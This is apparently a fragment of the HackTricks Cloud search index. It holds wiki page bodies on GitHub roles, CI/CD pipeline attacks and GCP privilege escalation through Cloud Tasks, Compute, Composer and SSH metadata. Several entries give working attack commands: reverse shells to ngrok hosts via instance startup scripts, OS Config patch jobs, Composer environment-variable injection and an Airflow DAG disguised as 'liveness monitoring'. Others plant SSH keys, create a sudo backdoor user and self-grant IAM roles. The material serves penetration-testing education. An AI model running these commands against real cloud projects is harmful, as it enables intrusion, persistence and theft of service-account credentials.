9,"breadcrumbs":6,"title":1},"943":{"body":61,"breadcrumbs":11,"title":3},"944":{"body":57,"breadcrumbs":9,"title":1},"945":{"body":17,"breadcrumbs":13,"title":5},"946":{"body":59,"breadcrumbs":9,"title":1},"947":{"body":30,"breadcrumbs":10,"title":2},"948":{"body":28,"breadcrumbs":10,"title":2},"949":{"body":72,"breadcrumbs":14,"title":6},"95":{"body":46,"breadcrumbs":10,"title":4},"950":{"body":61,"breadcrumbs":11,"title":3},"951":{"body":9,"breadcrumbs":10,"title":2},"952":{"body":88,"breadcrumbs":22,"title":14},"953":{"body":104,"breadcrumbs":11,"title":3},"954":{"body":28,"breadcrumbs":17,"title":9},"955":{"body":20,"breadcrumbs":10,"title":2},"956":{"body":23,"breadcrumbs":10,"title":2},"957":{"body":67,"breadcrumbs":12,"title":4},"958":{"body":96,"breadcrumbs":13,"title":5},"959":{"body":61,"breadcrumbs":13,"title":4},"96":{"body":6,"breadcrumbs":10,"title":4},"960":{"body":9,"breadcrumbs":11,"title":2},"961":{"body":634,"breadcrumbs":10,"title":1},"962":{"body":61,"breadcrumbs":11,"title":3},"963":{"body":5,"breadcrumbs":9,"title":1},"964":{"body":121,"breadcrumbs":10,"title":2},"965":{"body":61,"breadcrumbs":11,"title":3},"966":{"body":7,"breadcrumbs":9,"title":1},"967":{"body":30,"breadcrumbs":10,"title":2},"968":{"body":24,"breadcrumbs":10,"title":2},"969":{"body":64,"breadcrumbs":10,"title":2},"97":{"body":10,"breadcrumbs":9,"title":3},"970":{"body":27,"breadcrumbs":9,"title":1},"971":{"body":35,"breadcrumbs":10,"title":2},"972":{"body":27,"breadcrumbs":9,"title":1},"973":{"body":187,"breadcrumbs":12,"title":4},"974":{"body":61,"breadcrumbs":11,"title":3},"975":{"body":95,"breadcrumbs":12,"title":4},"976":{"body":61,"breadcrumbs":11,"title":3},"977":{"body":9,"breadcrumbs":9,"title":1},"978":{"body":127,"breadcrumbs":10,"title":2},"979":{"body":26,"breadcrumbs":9,"title":1},"98":{"body":15,"breadcrumbs":12,"title":6},"980":{"body":27,"breadcrumbs":9,"title":1},"981":{"body":72,"breadcrumbs":9,"title":1},"982":{"body":61,"breadcrumbs":11,"title":3},"983":{"body":8,"breadcrumbs":9,"title":1},"984":{"body":34,"breadcrumbs":11,"title":3},"985":{"body":131,"breadcrumbs":11,"title":3},"986":{"body":45,"breadcrumbs":9,"title":1},"987":{"body":7,"breadcrumbs":10,"title":2},"988":{"body":10,"breadcrumbs":9,"title":1},"989":{"body":53,"breadcrumbs":13,"title":5},"99":{"body":64,"breadcrumbs":7,"title":1},"990":{"body":47,"breadcrumbs":14,"title":6},"991":{"body":64,"breadcrumbs":9,"title":1},"992":{"body":61,"breadcrumbs":11,"title":3},"993":{"body":12,"breadcrumbs":9,"title":1},"994":{"body":28,"breadcrumbs":11,"title":3},"995":{"body":100,"breadcrumbs":11,"title":3},"996":{"body":61,"breadcrumbs":13,"title":4},"997":{"body":6,"breadcrumbs":11,"title":2},"998":{"body":145,"breadcrumbs":12,"title":3},"999":{"body":286,"breadcrumbs":12,"title":3}},"docs":{"0":{"body":"Reading time: 3 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos. Hacktricks logos & motion designed by @ppieranacho .","breadcrumbs":"HackTricks Cloud » HackTricks Cloud","id":"0","title":"HackTricks Cloud"},"1":{"body":"bash # Download latest version of hacktricks cloud\\ngit clone https://github.com/HackTricks-wiki/hacktricks-cloud # Select the language you want to use\\nexport LANG=\\"master\\" # Leave master for English\\n# \\"af\\" for Afrikaans\\n# \\"de\\" for German\\n# \\"el\\" for Greek\\n# \\"es\\" for Spanish\\n# \\"fr\\" for French\\n# \\"hi\\" for Hindi\\n# \\"it\\" for Italian\\n# \\"ja\\" for Japanese\\n# \\"ko\\" for Korean\\n# \\"pl\\" for Polish\\n# \\"pt\\" for Portuguese\\n# \\"sr\\" for Serbian\\n# \\"sw\\" for Swahili\\n# \\"tr\\" for Turkish\\n# \\"uk\\" for Ukrainian\\n# \\"zh\\" for Chinese # Run the docker container indicating the path to the hacktricks-cloud folder\\ndocker run -d --rm --platform linux/amd64 -p 3377:3000 --name hacktricks_cloud -v $(pwd)/hacktricks-cloud:/app ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image bash -c \\"mkdir -p ~/.ssh && ssh-keyscan -H github.com >> ~/.ssh/known_hosts && cd /app && git checkout $LANG && git pull && MDBOOK_PREPROCESSOR__HACKTRICKS__ENV=dev mdbook serve --hostname 0.0.0.0\\" Your local copy of HackTricks Cloud will be available at http://localhost:3377 after a minute.","breadcrumbs":"HackTricks Cloud » Run HackTricks Cloud Locally","id":"1","title":"Run HackTricks Cloud Locally"},"10":{"body":"The most common way to define a pipeline, is by using a CI configuration file hosted in the repository the pipeline builds. This file describes the order of executed jobs, conditions that affect the flow, and build environment settings. These files typically have a consistent name and format, for example — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), and the GitHub Actions YAML files located under .github/workflows. When triggered, the pipeline job pulls the code from the selected source (e.g. commit / branch), and runs the commands specified in the CI configuration file against that code. Therefore the ultimate goal of the attacker is to somehow compromise those configuration files or the commands they execute .","breadcrumbs":"Pentesting CI/CD Methodology » Pipelines Pentesting Methodology","id":"10","title":"Pipelines Pentesting Methodology"},"100":{"body":"Reading time: 16 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"Github Security » Basic Github Information » Basic Github Information","id":"100","title":"Basic Github Information"},"1000":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloud Scheduler Privesc » References","id":"1000","title":"References"},"1001":{"body":"Reading time: 3 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloud Tasks Privesc » GCP - Cloud Tasks Privesc","id":"1001","title":"GCP - Cloud Tasks Privesc"},"1002":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloud Tasks Privesc » Cloud Tasks","id":"1002","title":"Cloud Tasks"},"1003":{"body":"An attacker with these permissions can impersonate other service accounts by creating tasks that execute with the specified service account\'s identity. This allows sending authenticated HTTP requests to IAM-protected Cloud Run or Cloud Functions services. bash gcloud tasks create-http-task \\\\ task-$(date \'+%Y%m%d%H%M%S\') \\\\ --location us-central1 \\\\ --queue \\\\ --url \'https://.us-central1.run.app\' \\\\ --method POST \\\\ --header \'X-Hello: world\' \\\\ --body-content \'{\\"hello\\":\\"world\\"}\' \\\\ --oidc-service-account-email @.iam.gserviceaccount.com","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloud Tasks Privesc » cloudtasks.tasks.create, iam.serviceAccounts.actAs","id":"1003","title":"cloudtasks.tasks.create, iam.serviceAccounts.actAs"},"1004":{"body":"An attacker with these permissions can run existing scheduled tasks without having permissions on the service account associated with the task. This allows executing tasks that were previously created with higher privileged service accounts. bash gcloud tasks run projects//locations/us-central1/queues//tasks/ The principal executing this command doesn\'t need iam.serviceAccounts.actAs permission on the task\'s service account. However, this only allows running existing tasks - it doesn\'t grant the ability to create or modify tasks.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloud Tasks Privesc » cloudtasks.tasks.run, cloudtasks.tasks.list","id":"1004","title":"cloudtasks.tasks.run, cloudtasks.tasks.list"},"1005":{"body":"An attacker with this permission can grant themselves or other principals Cloud Tasks roles on specific queues, potentially escalating to roles/cloudtasks.admin which includes the ability to create and run tasks. bash gcloud tasks queues add-iam-policy-binding \\\\ \\\\ --location us-central1 \\\\ --member serviceAccount:@.iam.gserviceaccount.com \\\\ --role roles/cloudtasks.admin This allows the attacker to grant full Cloud Tasks admin permissions on the queue to any service account they control.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloud Tasks Privesc » cloudtasks.queues.setIamPolicy","id":"1005","title":"cloudtasks.queues.setIamPolicy"},"1006":{"body":"Google Cloud Tasks Documentation tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloud Tasks Privesc » References","id":"1006","title":"References"},"1007":{"body":"Reading time: 6 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Compute Privesc","id":"1007","title":"GCP - Compute Privesc"},"1008":{"body":"For more information about Compute and VPC (netowork) in GCP check: GCP - Compute Enum caution Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it\'s needed that you have actAs permissions over the SA attached to the instance , even if the SA is already attached!","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » Compute","id":"1008","title":"Compute"},"1009":{"body":"With that permission you can modify the metadata information of an instance and change the authorized keys of a user , or create a new user with sudo permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with. Limitations: Note that GCP Service Accounts running in VM instances by default have a very limited scope You will need to be able to contact the SSH server to login For more information about how to exploit this permission check: GCP - Add Custom SSH Metadata You could aslo perform this attack by adding new startup-script and rebooting the instance: bash gcloud compute instances add-metadata my-vm-instance \\\\ --metadata startup-script=\'#!/bin/bash\\nbash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18347 0>&1 &\' gcloud compute instances reset my-vm-instance","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.projects.setCommonInstanceMetadata","id":"1009","title":"compute.projects.setCommonInstanceMetadata"},"101":{"body":"The basic github environment structure of a big company is to own an enterprise which owns several organizations and each of them may contain several repositories and several teams. . Smaller companies may just own one organization and no enterprises . From a user point of view a user can be a member of different enterprises and organizations . Within them the user may have different enterprise, organization and repository roles . Moreover, a user may be part of different teams with different enterprise, organization or repository roles. And finally repositories may have special protection mechanisms .","breadcrumbs":"Github Security » Basic Github Information » Basic Structure","id":"101","title":"Basic Structure"},"1010":{"body":"This permission gives the same privileges as the previous permission but over a specific instances instead to a whole project. The same exploits and limitations as for the previous section applies .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.instances.setMetadata","id":"1010","title":"compute.instances.setMetadata"},"1011":{"body":"This kind of permission will allow you to grant yourself a role with the previous permissions and escalate privileges abusing them. Here is an example adding roles/compute.admin to a Service Account: bash export SERVER_SERVICE_ACCOUNT=YOUR_SA\\nexport INSTANCE=YOUR_INSTANCE\\nexport ZONE=YOUR_INSTANCE_ZONE cat < policy.json\\nbindings:\\n- members: - serviceAccount:$SERVER_SERVICE_ACCOUNT role: roles/compute.admin\\nversion: 1\\nEOF gcloud compute instances set-iam-policy $INSTANCE policy.json --zone=$ZONE","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.instances.setIamPolicy","id":"1011","title":"compute.instances.setIamPolicy"},"1012":{"body":"If OSLogin is enabled in the instance , with this permission you can just run gcloud compute ssh [INSTANCE] and connect to the instance. You won\'t have root privs inside the instance. tip In order to successfully login with this permission inside the VM instance, you need to have the iam.serviceAccounts.actAs permission over the SA atatched to the VM.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.instances.osLogin","id":"1012","title":"compute.instances.osLogin"},"1013":{"body":"If OSLogin is enabled in the instanc e, with this permission you can just run gcloud compute ssh [INSTANCE] and connect to the instance. You will have root privs inside the instance. tip In order to successfully login with this permission inside the VM instance, you need to have the iam.serviceAccounts.actAs permission over the SA atatched to the VM.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.instances.osAdminLogin","id":"1013","title":"compute.instances.osAdminLogin"},"1014":{"body":"It\'s possible to create a virtual machine with an assigned Service Account and steal the token of the service account accessing the metadata to escalate privileges to it. The exploit script for this method can be found here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.instances.create,iam.serviceAccounts.actAs, compute.disks.create, compute.instances.create, compute.instances.setMetadata, compute.instances.setServiceAccount, compute.subnetworks.use, compute.subnetworks.useExternalIp","id":"1014","title":"compute.instances.create,iam.serviceAccounts.actAs, compute.disks.create, compute.instances.create, compute.instances.setMetadata, compute.instances.setServiceAccount, compute.subnetworks.use, compute.subnetworks.useExternalIp"},"1015":{"body":"If you have the osconfig.patchDeployments.create or osconfig.patchJobs.exec permissions you can create a patch job or deployment . This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project. Note that at the moment you don\'t need actAs permission over the SA attached to the instance. If you want to manually exploit this you will need to create either a patch job or deployment . For a patch job run: python cat > /tmp/patch-job.sh <& /dev/tcp/0.tcp.eu.ngrok.io/18442 0>&1\\nEOF gsutil cp /tmp/patch-job.sh gs://readable-bucket-by-sa-in-instance/patch-job.sh # Get the generation number\\ngsutil ls -a gs://readable-bucket-by-sa-in-instance gcloud --project=$PROJECT_ID compute os-config patch-jobs execute \\\\ --instance-filter-names=zones/us-central1-a/instances/ \\\\ --pre-patch-linux-executable=gs://readable-bucket-by-sa-in-instance/patch-job.sh# \\\\ --reboot-config=never \\\\ --display-name=\\"Managed Security Update\\" \\\\ --duration=300s To deploy a patch deployment: bash gcloud compute os-config patch-deployments create ... The tool patchy could been used in the past for exploiting this misconfiguration (but now it\'s not working). An attacker could also abuse this for persistence.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » osconfig.patchDeployments.create | osconfig.patchJobs.exec","id":"1015","title":"osconfig.patchDeployments.create | osconfig.patchJobs.exec"},"1016":{"body":"Grant yourself extra permissions to compute Image.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.machineImages.setIamPolicy","id":"1016","title":"compute.machineImages.setIamPolicy"},"1017":{"body":"Grant yourself extra permissions to a disk snapshot.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.snapshots.setIamPolicy","id":"1017","title":"compute.snapshots.setIamPolicy"},"1018":{"body":"Grant yourself extra permissions to a disk.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.disks.setIamPolicy","id":"1018","title":"compute.disks.setIamPolicy"},"1019":{"body":"Following this link you find some ideas to try to bypass access scopes .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » Bypass Access Scopes","id":"1019","title":"Bypass Access Scopes"},"102":{"body":"","breadcrumbs":"Github Security » Basic Github Information » Privileges","id":"102","title":"Privileges"},"1020":{"body":"GCP - local privilege escalation ssh pivoting","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » Local Privilege Escalation in GCP Compute instance","id":"1020","title":"Local Privilege Escalation in GCP Compute instance"},"1021":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » References","id":"1021","title":"References"},"1022":{"body":"Reading time: 5 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Add Custom SSH Metadata » GCP - Add Custom SSH Metadata","id":"1022","title":"GCP - Add Custom SSH Metadata"},"1023":{"body":"Metadata modification on an instance could lead to significant security risks if an attacker gains the necessary permissions .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Add Custom SSH Metadata » Modifying the metadata","id":"1023","title":"Modifying the metadata"},"1024":{"body":"On GCP, Linux systems often execute scripts from the Python Linux Guest Environment for Google Compute Engine . A critical component of this is the accounts daemon , which is designed to regularly check the instance metadata endpoint for updates to the authorized SSH public keys . Therefore, if an attacker can modify custom metadata, he could make the the daemon find a new public key, which will processed and integrated into the local system . The key will be added into ~/.ssh/authorized_keys file of an existing user or potentially creating a new user with sudo privileges , depending on the key\'s format. And the attacker will be able to compromise the host.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Add Custom SSH Metadata » Incorporation of SSH Keys into Custom Metadata","id":"1024","title":"Incorporation of SSH Keys into Custom Metadata"},"1025":{"body":"Examine Existing SSH Keys on the Instance: Execute the command to describe the instance and its metadata to locate existing SSH keys. The relevant section in the output will be under metadata, specifically the ssh-keys key. gcloud compute instances describe [INSTANCE] --zone [ZONE] Pay attention to the format of the SSH keys: the username precedes the key, separated by a colon. Prepare a Text File for SSH Key Metadata: Save the details of usernames and their corresponding SSH keys into a text file named meta.txt. This is essential for preserving the existing keys while adding new ones. Generate a New SSH Key for the Target User (alice in this example): Use the ssh-keygen command to generate a new SSH key, ensuring that the comment field (-C) matches the target username. ssh-keygen -t rsa -C \\"alice\\" -f ./key -P \\"\\" && cat ./key.pub Add the new public key to meta.txt, mimicking the format found in the instance\'s metadata. Update the Instance\'s SSH Key Metadata: Apply the updated SSH key metadata to the instance using the gcloud compute instances add-metadata command. gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt Access the Instance Using the New SSH Key: Connect to the instance with SSH using the new key, accessing the shell in the context of the target user (alice in this example). ssh -i ./key alice@localhost\\nsudo id","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Add Custom SSH Metadata » Add SSH key to existing privileged user","id":"1025","title":"Add SSH key to existing privileged user"},"1026":{"body":"If no interesting user is found, it\'s possible to create a new one which will be given sudo privileges: bash # define the new account username\\nNEWUSER=\\"definitelynotahacker\\" # create a key\\nssh-keygen -t rsa -C \\"$NEWUSER\\" -f ./key -P \\"\\" # create the input meta file\\nNEWKEY=\\"$(cat ./key.pub)\\"\\necho \\"$NEWUSER:$NEWKEY\\" > ./meta.txt # update the instance metadata\\ngcloud compute instances add-metadata [INSTANCE_NAME] --metadata-from-file ssh-keys=meta.txt # ssh to the new account\\nssh -i ./key \\"$NEWUSER\\"@localhost","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Add Custom SSH Metadata » Create a new privileged user and add a SSH key","id":"1026","title":"Create a new privileged user and add a SSH key"},"1027":{"body":"It\'s possible to broaden the reach of SSH access to multiple Virtual Machines (VMs) in a cloud environment by applying SSH keys at the project level . This approach allows SSH access to any instance within the project that hasn\'t explicitly blocked project-wide SSH keys. Here\'s a summarized guide: Apply SSH Keys at the Project Level: Use the gcloud compute project-info add-metadata command to add SSH keys from meta.txt to the project\'s metadata. This action ensures that the SSH keys are recognized across all VMs in the project, unless a VM has the \\"Block project-wide SSH keys\\" option enabled. gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt SSH into Instances Using Project-Wide Keys: With project-wide SSH keys in place, you can SSH into any instance within the project. Instances that do not block project-wide keys will accept the SSH key, granting access. A direct method to SSH into an instance is using the gcloud compute ssh [INSTANCE] command. This command uses your current username and the SSH keys set at the project level to attempt access.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Add Custom SSH Metadata » SSH keys at project level","id":"1027","title":"SSH keys at project level"},"1028":{"body":"https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/ tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Add Custom SSH Metadata » References","id":"1028","title":"References"},"1029":{"body":"Reading time: 4 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » GCP - Composer Privesc","id":"1029","title":"GCP - Composer Privesc"},"103":{"body":"Enterprise owner : People with this role can manage administrators, manage organizations within the enterprise, manage enterprise settings, enforce policy across organizations . However, they cannot access organization settings or content unless they are made an organization owner or given direct access to an organization-owned repository Enterprise members : Members of organizations owned by your enterprise are also automatically members of the enterprise .","breadcrumbs":"Github Security » Basic Github Information » Enterprise Roles","id":"103","title":"Enterprise Roles"},"1030":{"body":"More info in: GCP - Composer Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » composer","id":"1030","title":"composer"},"1031":{"body":"It\'s possible to attach any service account to the newly create composer environment with that permission. Later you could execute code inside composer to steal the service account token. bash gcloud composer environments create privesc-test \\\\ --project \\"${PROJECT_ID}\\" \\\\ --location europe-west1 \\\\ --service-account=\\"${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com\\" More info about the exploitation here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » composer.environments.create","id":"1031","title":"composer.environments.create"},"1032":{"body":"It\'s possible to update composer environment, for example, modifying env variables: bash # Even if it says you don\'t have enough permissions the update happens\\ngcloud composer environments update \\\\ projects//locations//environments/ \\\\ --update-env-variables=\\"PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c \'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/19990 0>&1\' & #%s\\" \\\\ --location \\\\ --project # Call the API endpoint directly\\nPATCH /v1/projects//locations//environments/?alt=json&updateMask=config.software_config.env_variables HTTP/2\\nHost: composer.googleapis.com\\nUser-Agent: google-cloud-sdk gcloud/480.0.0 command/gcloud.composer.environments.update invocation-id/826970373cd441a8801d6a977deba693 environment/None environment-version/None client-os/MACOSX client-os-ver/23.4.0 client-pltf-arch/arm interactive/True from-script/False python/3.12.3 term/xterm-256color (Macintosh; Intel Mac OS X 23.4.0)\\nAccept-Encoding: gzip, deflate, br\\nAccept: application/json\\nContent-Length: 178\\nContent-Type: application/json\\nX-Goog-Api-Client: cred-type/sa\\nAuthorization: Bearer [token]\\nX-Allowed-Locations: 0x0 {\\"config\\": {\\"softwareConfig\\": {\\"envVariables\\": {\\"BROWSER\\": \\"/bin/bash -c \'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/1890 0>&1\' & #%s\\", \\"PYTHONWARNINGS\\": \\"all:0:antigravity.x:0:0\\"}}}} TODO: Get RCE by adding new pypi packages to the environment","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » composer.environments.update","id":"1032","title":"composer.environments.update"},"1033":{"body":"Check the source code of the dags being executed: bash mkdir /tmp/dags\\ngcloud composer environments storage dags export --environment --location --destination /tmp/dags","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » Download Dags","id":"1033","title":"Download Dags"},"1034":{"body":"Add the python DAG code into a file and import it running: bash # TODO: Create dag to get a rev shell\\ngcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/dags/reverse_shell.py Reverse shell DAG: reverse_shell.py import airflow\\nfrom airflow import DAG\\nfrom airflow.operators.bash_operator import BashOperator\\nfrom datetime import timedelta default_args = { \'start_date\': airflow.utils.dates.days_ago(0), \'retries\': 1, \'retry_delay\': timedelta(minutes=5)\\n} dag = DAG( \'reverse_shell\', default_args=default_args, description=\'liveness monitoring dag\', schedule_interval=\'*/10 * * * *\', max_active_runs=1, catchup=False, dagrun_timeout=timedelta(minutes=10),\\n) # priority_weight has type int in Airflow DB, uses the maximum.\\nt1 = BashOperator( task_id=\'bash_rev\', bash_command=\'bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/14382 0>&1\', dag=dag, depends_on_past=False, priority_weight=2**31 - 1, do_xcom_push=False)","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » Import Dags","id":"1034","title":"Import Dags"},"1035":{"body":"All the components of a composer environments (DAGs, plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and whenever a DAG is created or updated, submit a backdoored version so the composer environment will get from the storage the backdoored version. Get more info about this attack in: GCP - Storage Privesc","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » Write Access to the Composer bucket","id":"1035","title":"Write Access to the Composer bucket"},"1036":{"body":"TODO: Check what is possible to compromise by uploading plugins","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » Import Plugins","id":"1036","title":"Import Plugins"},"1037":{"body":"TODO: Check what is possible to compromise by uploading data tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Composer Privesc » Import Data","id":"1037","title":"Import Data"},"1038":{"body":"Reading time: 5 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » GCP - Container Privesc","id":"1038","title":"GCP - Container Privesc"},"1039":{"body":"","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Container Privesc » container","id":"1039","title":"container"},"104":{"body":"In an organisation users can have different roles: Organization owners : Organization owners have complete administrative access to your organization . This role should be limited, but to no less than two people, in your organization. Organization members : The default , non-administrative role for people in an organization is the organization member. By default, organization members have a number of permissions . Billing managers : Billing managers are users who can manage the billing settings for your organization , such as payment information. Security Managers : It\'s a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to manage security alerts and settings across your organization, as well as read permissions for all repositories in the organization. If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization. Github App managers : To allow additional users to manage GitHub Apps 